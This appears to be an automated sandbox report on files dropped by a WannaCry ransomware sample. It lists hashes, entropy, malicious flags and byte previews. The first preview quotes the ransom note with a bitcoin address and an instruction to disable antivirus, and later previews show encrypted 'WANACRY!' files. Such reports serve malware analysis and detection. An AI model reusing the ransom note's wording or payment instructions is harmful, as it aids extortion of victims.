                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.99981275090966
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:5IDwWOXo/Q/CMLdONUHt7vqChakqdOj5S/r3jyTkd0jbFnhICNXuz:5IDwhkoCM800kqdFHai0jbvNXO
                                                                                      MD5:DF718701FA0B0549223FA4F372791BA3
                                                                                      SHA1:C99A262CE9F15673B1E8D7888C3807F28F56E0DD
                                                                                      SHA-256:930755C8881BBD736EC81F22A4A658E7367857E87BD7E9FE5CD0E49B87CD80F7
                                                                                      SHA-512:15F453DC78322BF71A70091DCA048CE7099FFADE065216DBEAFB2D3A1B11ADB1394A8A85E750FC18714A45B0672E97AFC1278E066852F14D088B59C735AF86AE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....s...4.k.88}.~.....:......T?.g...O..}@x."...F........r=G..P.)...M...eR...n.P..;WLVRP...tf../..Z^.W.*LJgo..&....T?g...O.8..5.j..>k;/V......20.J..;t.R..N.%#k<..L{.|....o."zMm..#.?....D.p.S.L.......T......< ....e$.!.....yN.?wg.&.1-.H..F~.\PS.)..k;H.............X...V(A.dc..8Aj...!`.........H9.-2.]E..i....!hv.m.....pQO.;p..l<K.HW.1.,l.V.i...j...DP.VM9..D\.H.8l|[...2.|.m..6.m4........_.I..7......o.K-...7..|.|..Wer..:.QK...k@.Xz.-8K....{0B.`.m...RE.....{.KR>>....\.X..u]".s.;...1.[^(o.jT..v.2(.1....<...,...i...u|...t..{..............\..:h.y.._..0;+..!.q.....u.?s.o8..3^>.x\x&....$O..Dp-S.A..G2.1..Xf..u._ ..l...)>.!...@....Qu.AR........`dS.fm..........A.n...u.w.).}.FDx.2X.d.j.L.VXAgU}....WI....O^..Y..G..7]<../1.lp...<...O...........]..5..4...:..x..."..K....~..iM.I......<%.i`...a.@#`'..a.88..8_.....O.."...1.)....!..g.y.f...b.....>.v*.".hW..y..z.....b....J.a...#.Yw....p...%..:.7...J.".S.......u..sL.;....w..F_2{.u.Zp.$WA.\ ...N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.99981275090966
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:5IDwWOXo/Q/CMLdONUHt7vqChakqdOj5S/r3jyTkd0jbFnhICNXuz:5IDwhkoCM800kqdFHai0jbvNXO
                                                                                      MD5:DF718701FA0B0549223FA4F372791BA3
                                                                                      SHA1:C99A262CE9F15673B1E8D7888C3807F28F56E0DD
                                                                                      SHA-256:930755C8881BBD736EC81F22A4A658E7367857E87BD7E9FE5CD0E49B87CD80F7
                                                                                      SHA-512:15F453DC78322BF71A70091DCA048CE7099FFADE065216DBEAFB2D3A1B11ADB1394A8A85E750FC18714A45B0672E97AFC1278E066852F14D088B59C735AF86AE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....s...4.k.88}.~.....:......T?.g...O..}@x."...F........r=G..P.)...M...eR...n.P..;WLVRP...tf../..Z^.W.*LJgo..&....T?g...O.8..5.j..>k;/V......20.J..;t.R..N.%#k<..L{.|....o."zMm..#.?....D.p.S.L.......T......< ....e$.!.....yN.?wg.&.1-.H..F~.\PS.)..k;H.............X...V(A.dc..8Aj...!`.........H9.-2.]E..i....!hv.m.....pQO.;p..l<K.HW.1.,l.V.i...j...DP.VM9..D\.H.8l|[...2.|.m..6.m4........_.I..7......o.K-...7..|.|..Wer..:.QK...k@.Xz.-8K....{0B.`.m...RE.....{.KR>>....\.X..u]".s.;...1.[^(o.jT..v.2(.1....<...,...i...u|...t..{..............\..:h.y.._..0;+..!.q.....u.?s.o8..3^>.x\x&....$O..Dp-S.A..G2.1..Xf..u._ ..l...)>.!...@....Qu.AR........`dS.fm..........A.n...u.w.).}.FDx.2X.d.j.L.VXAgU}....WI....O^..Y..G..7]<../1.lp...<...O...........]..5..4...:..x..."..K....~..iM.I......<%.i`...a.@#`'..a.88..8_.....O.."...1.)....!..g.y.f...b.....>.v*.".hW..y..z.....b....J.a...#.Yw....p...%..:.7...J.".S.......u..sL.;....w..F_2{.u.Zp.$WA.\ ...N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8248
                                                                                      Entropy (8bit):7.977611020661361
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:B/KLp0rbWHtalgJeRJTXLfnphPm2idJyct3cKzZlp0GjdsfAH:Jg0rbWcl8eRJBhPmf6OZ/0GjdUq
                                                                                      MD5:788BAA22770C353D52E8F087E7DF5AB3
                                                                                      SHA1:D8F2807C1878EA89A295E6B0213C75C1D3726F0D
                                                                                      SHA-256:ED282C6B413E3215C8B835FDB7F98CBA81386B247B50638A82B835398484C8E8
                                                                                      SHA-512:2EDA60D441D6046FA8B350A2E7D9EA203A4578E343F2FB36532AC22C8EA4E9825FF96FF1E385B5A7D1CAD0A05B203E78195799A6FC2B3176A71ABDEB6E0C6186
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........9.X|.N.3U&B.Gt.Z..P.-.u..D..W.i.%{.aV..{. 6$k.T.*..>.}"...g[6.n.......75..m....l..I/....*.N...?9..=I.8u.GOE..1L...94.&.t<....&...?~.S.s..!O;.v.oq.EeR-L..<....TN.....L.<cP.FVG.....R..;.[!...1Y.U..\n.7.g.YG....#6B..q...J.O.q;,...u.Y.E.d...............:tQ.. .......A.J7LWL;...<...h.....W"..c...a.o...{.7.A..........E"w......b...yl..=.K.^S.;.-.. ...(*.......o.^...e.v.*O#....l...)..f.S.Z.k....D.oj..O..'.'.v.5.9..b.".........zs$l.....\..IH2.,.)}}A.q...W.....%'...&.P...D.......+Ba..r.9...x........A..."..5..a.D..9..x..(........+..*...m.?H.*.;.b@......$..}H...#+...N...:.e8K.p.#...D.=.....5J....q....o._....>.?.O..MA...P.O~j..M.rw..nZ.......:^....*Mo....B..f.%.....N...u.1..Psp.5.tA.|..j.......d....W......*j4....29o..%..+.x..l...I.....7..;.$*.y.LC.U..+.>.E.3.X.\.4..m.J..7.........v$.f,.....o);@.M..*8g.G....6N4i.bM..\3....:yqTR.$o.kZ.....cO..z|..9..A....ih..m..F...q.\t.B.... 5y..o.(Z@.... ..bl....hh......lo..yei9n....1$.....hiU.l...m<.O.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8248
                                                                                      Entropy (8bit):7.977611020661361
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:B/KLp0rbWHtalgJeRJTXLfnphPm2idJyct3cKzZlp0GjdsfAH:Jg0rbWcl8eRJBhPmf6OZ/0GjdUq
                                                                                      MD5:788BAA22770C353D52E8F087E7DF5AB3
                                                                                      SHA1:D8F2807C1878EA89A295E6B0213C75C1D3726F0D
                                                                                      SHA-256:ED282C6B413E3215C8B835FDB7F98CBA81386B247B50638A82B835398484C8E8
                                                                                      SHA-512:2EDA60D441D6046FA8B350A2E7D9EA203A4578E343F2FB36532AC22C8EA4E9825FF96FF1E385B5A7D1CAD0A05B203E78195799A6FC2B3176A71ABDEB6E0C6186
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........9.X|.N.3U&B.Gt.Z..P.-.u..D..W.i.%{.aV..{. 6$k.T.*..>.}"...g[6.n.......75..m....l..I/....*.N...?9..=I.8u.GOE..1L...94.&.t<....&...?~.S.s..!O;.v.oq.EeR-L..<....TN.....L.<cP.FVG.....R..;.[!...1Y.U..\n.7.g.YG....#6B..q...J.O.q;,...u.Y.E.d...............:tQ.. .......A.J7LWL;...<...h.....W"..c...a.o...{.7.A..........E"w......b...yl..=.K.^S.;.-.. ...(*.......o.^...e.v.*O#....l...)..f.S.Z.k....D.oj..O..'.'.v.5.9..b.".........zs$l.....\..IH2.,.)}}A.q...W.....%'...&.P...D.......+Ba..r.9...x........A..."..5..a.D..9..x..(........+..*...m.?H.*.;.b@......$..}H...#+...N...:.e8K.p.#...D.=.....5J....q....o._....>.?.O..MA...P.O~j..M.rw..nZ.......:^....*Mo....B..f.%.....N...u.1..Psp.5.tA.|..j.......d....W......*j4....29o..%..+.x..l...I.....7..;.$*.y.LC.U..+.>.E.3.X.\.4..m.J..7.........v$.f,.....o);@.M..*8g.G....6N4i.bM..\3....:yqTR.$o.kZ.....cO..z|..9..A....ih..m..F...q.\t.B.... 5y..o.(Z@.... ..bl....hh......lo..yei9n....1$.....hiU.l...m<.O.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5976
                                                                                      Entropy (8bit):7.969726397498845
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oEMcyJsnYK8vHiLQm4MjOfrHOB36doCrX9/dzb/8o2xVOLzv5ZsOzIoOHRyUzBXr:L7ybK2CLyMjE/oIXhdzgFzOXv5Zjso8x
                                                                                      MD5:C920D80B0CE9BF98CDBB19E0F401FDEE
                                                                                      SHA1:589BE8C8C6985330663367B59F2E9B118BEE1A05
                                                                                      SHA-256:DF5EDF79AC39F12885B35034B8433CF1A18C7890E49B60000D47FAA77E5D0D7E
                                                                                      SHA-512:C0C3EAF85E27F5DEEB3393C14F2E0A4DCCA625D49AC86AAF40F4A3F13466870D5AB25566E454869BA29948F565FCC247EEBF972D2F00065BC8F0A4DFFA9A36B1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d......$`.F.......f.o,...r.....;...W...#.K..c..T1k...K.....I.....mW7.T.[Ne..y.J...d...2..O~.....6'...6>Y..0.fFM..U.j.{. ...<FD...JV{..'lx..*<.%.^...............v.SX..Y..._.,2....]..!..R.T.n)u..5dc&P.....2N..*P..t.j..%.(.`...D.*......%a".B.b....9........V.._:..v:..+q...;..i.IBJH.....d..aR.j&.;=Q..,.+..w.]./m.h.m..[.....&./..q.T.........../...oV..9.r.{K...~...."h......`..UW.?Y..v8'....]U..*JP....;...".j..p.KD.fLIm.A'b.....Y._..A../..{4r.U^v._....~M....v[..}..N3....i.I......:.Z. 2....Ps.............'^.......[...p.=npp{.~...\}._d\......i.'l.Zg..g.}.....B...F..E.UZ.}.....A..|...3...o=..lX,.....Z.5..E9....'.....>~g.hn...A*.@...0..|<k..c..1^aX...@....^7a....9.eOb..9x.....g.5....8..2U....,.{..5c3z...45yw.,\..I...r......b[C..\.i!..X........Ea..7.....D1Q.c..Y.8Ua...6...f...K}.<.,.^.|..'..].a...9..........*....r..v....J..I9.__)hB....t.LH.C....Z.a..Y*...>...Xd17.]..3FT.........V.'hWlJ..+...oi.....5..dw.A...z..Z..|K...C...E.+...B.Os.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5976
                                                                                      Entropy (8bit):7.969726397498845
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oEMcyJsnYK8vHiLQm4MjOfrHOB36doCrX9/dzb/8o2xVOLzv5ZsOzIoOHRyUzBXr:L7ybK2CLyMjE/oIXhdzgFzOXv5Zjso8x
                                                                                      MD5:C920D80B0CE9BF98CDBB19E0F401FDEE
                                                                                      SHA1:589BE8C8C6985330663367B59F2E9B118BEE1A05
                                                                                      SHA-256:DF5EDF79AC39F12885B35034B8433CF1A18C7890E49B60000D47FAA77E5D0D7E
                                                                                      SHA-512:C0C3EAF85E27F5DEEB3393C14F2E0A4DCCA625D49AC86AAF40F4A3F13466870D5AB25566E454869BA29948F565FCC247EEBF972D2F00065BC8F0A4DFFA9A36B1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d......$`.F.......f.o,...r.....;...W...#.K..c..T1k...K.....I.....mW7.T.[Ne..y.J...d...2..O~.....6'...6>Y..0.fFM..U.j.{. ...<FD...JV{..'lx..*<.%.^...............v.SX..Y..._.,2....]..!..R.T.n)u..5dc&P.....2N..*P..t.j..%.(.`...D.*......%a".B.b....9........V.._:..v:..+q...;..i.IBJH.....d..aR.j&.;=Q..,.+..w.]./m.h.m..[.....&./..q.T.........../...oV..9.r.{K...~...."h......`..UW.?Y..v8'....]U..*JP....;...".j..p.KD.fLIm.A'b.....Y._..A../..{4r.U^v._....~M....v[..}..N3....i.I......:.Z. 2....Ps.............'^.......[...p.=npp{.~...\}._d\......i.'l.Zg..g.}.....B...F..E.UZ.}.....A..|...3...o=..lX,.....Z.5..E9....'.....>~g.hn...A*.@...0..|<k..c..1^aX...@....^7a....9.eOb..9x.....g.5....8..2U....,.{..5c3z...45yw.,\..I...r......b[C..\.i!..X........Ea..7.....D1Q.c..Y.8Ua...6...f...K}.<.,.^.|..'..].a...9..........*....r..v....J..I9.__)hB....t.LH.C....Z.a..Y*...>...Xd17.]..3FT.........V.'hWlJ..+...oi.....5..dw.A...z..Z..|K...C...E.+...B.Os.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):19880
                                                                                      Entropy (8bit):7.9902930343252425
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:2cOLPJnHlzstmBp5FqAChUoG0WS1OWMA6ung9nbjx2U8+ZZgX9k:2BPJH95ChUVVWMA6ug5bdp8+Zc9k
                                                                                      MD5:65E3120CD10CD28F783CBAABC2474052
                                                                                      SHA1:3F4083BA71BBD5D059C2911BDEA93D0132BFB1B4
                                                                                      SHA-256:09240F16DC25B981FCB0D83C85E3A49691FECFE2D8E70D75EBBE1EA8FFF810F8
                                                                                      SHA-512:907F090DE3566B51D492A945B730A9F1CD194FA13AD6631E435B954CDEC43CF1A2681E16C243518A9C6C391E3235D863DA36339431FE3C7290EACA8C7598F300
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....#..Trr.%Q....5..........M.[.= ..$.w<'..x!o..aD.m0B..y...#../.8@_.(..F#;..%[...~...=...~..&..B.Kh..z....QxA.*.......M.9.-..TI.a.....=.gG.......x..M....B..}.m.....hC....8..4.&.1Z.:...u..]..lC.l.43X....?m..].....r/.......}\.7v.."...N|...C#m....j.......L........y.fX-\U ..q...+..A.0...>g.,......A. 6D.g...&...W.[.s.9G...'T...7bE.{c..IBj.......qyr.8.L%N{..o....w....0..=..,[&.....o[..............co._x...z>...e[l.h..>C?..._.D..u.]0.(..XJ...v.la.s.@........d ...g.|..i...yq}<'q...!..p2.L.L..i0OJ.y.......@..u.._}......S.....B...c.*.J/s.#.*y....=..2.^.9..!..&..f....e.....A...J..>Lu...<Eg.b..'_h.l..OQ..X..`FI4....3.g.ko\.D....r.....C_Rt..v..5#..p...??....\...8b...*....o..b.Gn..../:.a.r&@....4..xlb...v'..v.......O#f....s53...kg....~].|.w.....zC ....7dp4. >_M..[...A..8...<.G.."F!....=..y{....$,..[m....SWw.'.r..P......VJ"...E..^l...,$.?........ka'.!......Mo....o....3.z..V(...6....K....1...;.d...C./8...I..o<g."..#......i......:......F...Q.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):19880
                                                                                      Entropy (8bit):7.9902930343252425
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:2cOLPJnHlzstmBp5FqAChUoG0WS1OWMA6ung9nbjx2U8+ZZgX9k:2BPJH95ChUVVWMA6ug5bdp8+Zc9k
                                                                                      MD5:65E3120CD10CD28F783CBAABC2474052
                                                                                      SHA1:3F4083BA71BBD5D059C2911BDEA93D0132BFB1B4
                                                                                      SHA-256:09240F16DC25B981FCB0D83C85E3A49691FECFE2D8E70D75EBBE1EA8FFF810F8
                                                                                      SHA-512:907F090DE3566B51D492A945B730A9F1CD194FA13AD6631E435B954CDEC43CF1A2681E16C243518A9C6C391E3235D863DA36339431FE3C7290EACA8C7598F300
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....#..Trr.%Q....5..........M.[.= ..$.w<'..x!o..aD.m0B..y...#../.8@_.(..F#;..%[...~...=...~..&..B.Kh..z....QxA.*.......M.9.-..TI.a.....=.gG.......x..M....B..}.m.....hC....8..4.&.1Z.:...u..]..lC.l.43X....?m..].....r/.......}\.7v.."...N|...C#m....j.......L........y.fX-\U ..q...+..A.0...>g.,......A. 6D.g...&...W.[.s.9G...'T...7bE.{c..IBj.......qyr.8.L%N{..o....w....0..=..,[&.....o[..............co._x...z>...e[l.h..>C?..._.D..u.]0.(..XJ...v.la.s.@........d ...g.|..i...yq}<'q...!..p2.L.L..i0OJ.y.......@..u.._}......S.....B...c.*.J/s.#.*y....=..2.^.9..!..&..f....e.....A...J..>Lu...<Eg.b..'_h.l..OQ..X..`FI4....3.g.ko\.D....r.....C_Rt..v..5#..p...??....\...8b...*....o..b.Gn..../:.a.r&@....4..xlb...v'..v.......O#f....s53...kg....~].|.w.....zC ....7dp4. >_M..[...A..8...<.G.."F!....=..y{....$,..[m....SWw.'.r..P......VJ"...E..^l...,$.?........ka'.!......Mo....o....3.z..V(...6....K....1...;.d...C./8...I..o<g."..#......i......:......F...Q.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2104
                                                                                      Entropy (8bit):7.90239109310639
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkFZ83DDB0rw2wWEsO6N03GIDOSlLFb377m6scCW3WPN9Z:oFZ60rw2wjsJqD5x376bKs9Z
                                                                                      MD5:4087B4A0E0C46BBDE3D3A576336F3230
                                                                                      SHA1:24F6AC070B4831F9D0D831CDD2536A0573B8226A
                                                                                      SHA-256:ABB86F5F5DA6472CB57B813CF13F5BABCB3727EBEB7BCF5208D70D4E44BDAB0F
                                                                                      SHA-512:94354CA6E541F33D00270BE1903EAA09C4FE21151260620650A34794CAE1FA4E8D262BB90466474480F078F14E6020A04B3D4D27C73AC6A42617EB6C2CB19C33
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........~..."z~...o..s.{v).|.x..-~.%....|...F....3R9H....U..>...X4<.4........A.....f.7~J.2.6;a.R,. ..W...I.n..L...4y..,..Yx........."..l|...LRJ..<.=G:.U...KV.E.. IS...h,#,|qW:%.fBR2X:x...3..%.v..t.f...R..i..Li.;.&..J...Q]\.H)../.}}$.V..`...{................N.:..{..`.Kw-.l..f&~..9U...c..0...7.....=..)..(.)G.3.......O..b...5.{..X.$d.]......E.C......<r.x.)>Sh.)?.O..OQ.x.z.............jr...b{9 . .....z.....ePE...PF(W.[.9/kZ.....4^.I{.U..>b....$DQ.1z...L@.[X...;...f.7.}...r..B%.#R.j.......[eo.9...,...);.LL.?l].....CJ.r.h..!Ei.4...Q4.....u..[.|.,*g..i.y=.h..jw.F.. .OO.G........@....t.&..5_.).DQV...h.IgUE.`t,%..J..M.u;.=.3>.g....X..B.&..ZW.Qa@|....%)..AU_...y.*.....f.)..a..q....O.h....xW3Qa.~TN......Y..e.).3....!.'.W,0.$r...9.....s.g...da...v....{.o..u..X(W.j.....-ew.I{.b.|r.k..|a.+@..sE..a.&}.....d...0.#A.I%..x.Vi..f....A._p.Lq.......y..<.y.Qg.N2..1....p..6....R?. !..NBr...'..H.5....3.&i.4.l...Kl...K.....l.a.......A.....o.5G.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2104
                                                                                      Entropy (8bit):7.90239109310639
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkFZ83DDB0rw2wWEsO6N03GIDOSlLFb377m6scCW3WPN9Z:oFZ60rw2wjsJqD5x376bKs9Z
                                                                                      MD5:4087B4A0E0C46BBDE3D3A576336F3230
                                                                                      SHA1:24F6AC070B4831F9D0D831CDD2536A0573B8226A
                                                                                      SHA-256:ABB86F5F5DA6472CB57B813CF13F5BABCB3727EBEB7BCF5208D70D4E44BDAB0F
                                                                                      SHA-512:94354CA6E541F33D00270BE1903EAA09C4FE21151260620650A34794CAE1FA4E8D262BB90466474480F078F14E6020A04B3D4D27C73AC6A42617EB6C2CB19C33
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........~..."z~...o..s.{v).|.x..-~.%....|...F....3R9H....U..>...X4<.4........A.....f.7~J.2.6;a.R,. ..W...I.n..L...4y..,..Yx........."..l|...LRJ..<.=G:.U...KV.E.. IS...h,#,|qW:%.fBR2X:x...3..%.v..t.f...R..i..Li.;.&..J...Q]\.H)../.}}$.V..`...{................N.:..{..`.Kw-.l..f&~..9U...c..0...7.....=..)..(.)G.3.......O..b...5.{..X.$d.]......E.C......<r.x.)>Sh.)?.O..OQ.x.z.............jr...b{9 . .....z.....ePE...PF(W.[.9/kZ.....4^.I{.U..>b....$DQ.1z...L@.[X...;...f.7.}...r..B%.#R.j.......[eo.9...,...);.LL.?l].....CJ.r.h..!Ei.4...Q4.....u..[.|.,*g..i.y=.h..jw.F.. .OO.G........@....t.&..5_.).DQV...h.IgUE.`t,%..J..M.u;.=.3>.g....X..B.&..ZW.Qa@|....%)..AU_...y.*.....f.)..a..q....O.h....xW3Qa.~TN......Y..e.).3....!.'.W,0.$r...9.....s.g...da...v....{.o..u..X(W.j.....-ew.I{.b.|r.k..|a.+@..sE..a.&}.....d...0.#A.I%..x.Vi..f....A._p.Lq.......y..<.y.Qg.N2..1....p..6....R?. !..NBr...'..H.5....3.&i.4.l...Kl...K.....l.a.......A.....o.5G.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3160
                                                                                      Entropy (8bit):7.935250247314617
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkkU3Hacj6TKwUevGXJjK7Mek2IAD2tPSKHlH5+M1mrYTI1SKpXCjM/3AftMj2DY:oBHZmKwUcGXQ3IttKSlHAKM5CIoVMac
                                                                                      MD5:14B85791FC988DB640A3333D9D54DE7A
                                                                                      SHA1:4EE4BB81FAD401A8408F899811CB196D9141777D
                                                                                      SHA-256:2BA2B42BF9D37118341297D6784648AA764425B0127AE03DABE46A81D1DA5E65
                                                                                      SHA-512:5DD8CB2A2B6AB05D246EC02585D9CAAD3D87710E6CD721173D041591F7FFC52916F880F190E2E62CF3873CF4F4B51E67B9121AD114BDF1D6A2E2221D84A9EDA9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......',..>.V...1.k:g:../.-+@".P....E.m..L...DS...=.e....-._..+.C...as{..).VH.....=........7~....1..Y(....;.J.......HI.C...A..X.@....H.o..;..3.@(.....W.J|...c...@.M....qU...U.*.\........F/..\/......i.........gh...+.Hj..X..........76.*...z...EE.^7.t.....3.........y..`......!.u...B9Q.,?..:...u...N^.........T.O...&R7....F]...n.zX..2_.c>Y?..Ws.I...c.S.<z...^t...2.s..2._.$6$.N..K .~.t\.....J.......$_<........0@:....q....;.......0...},*...E......k.*_u....(.<...~L0DYW/..R.t.)....Ni.I....#X.j..`.r....U..........kL.~Pl...*.Cu.`.EZ....9..S...w....kfP.dK..9..dn....s.V..ih...J.6..C;.nQ..y..~.\.:..F..5...PiT^..|.....I.../.-5.}.....l.g..c|.>....Jp....a.....K[W..~.7E...g.....ZM..c..&.+{......../>&/#.2.:.....y....A......J....6.9G"j9...}.A...L..93{....Ua...~&....\...}0.Z..n=... ..}......P.n?:........<.vy:A+....:...?.....:....F,.L.x..'R...pv.h.E.!.MM..c"..&.w(...e...D....|....l.#Jy.4!,.;.....zV...r..X...W.Og.~........0`..,.J.A...db..H.....Gm
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3160
                                                                                      Entropy (8bit):7.935250247314617
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkkU3Hacj6TKwUevGXJjK7Mek2IAD2tPSKHlH5+M1mrYTI1SKpXCjM/3AftMj2DY:oBHZmKwUcGXQ3IttKSlHAKM5CIoVMac
                                                                                      MD5:14B85791FC988DB640A3333D9D54DE7A
                                                                                      SHA1:4EE4BB81FAD401A8408F899811CB196D9141777D
                                                                                      SHA-256:2BA2B42BF9D37118341297D6784648AA764425B0127AE03DABE46A81D1DA5E65
                                                                                      SHA-512:5DD8CB2A2B6AB05D246EC02585D9CAAD3D87710E6CD721173D041591F7FFC52916F880F190E2E62CF3873CF4F4B51E67B9121AD114BDF1D6A2E2221D84A9EDA9
                                                                                      Malicious:false
                                                                                      Reputation:low
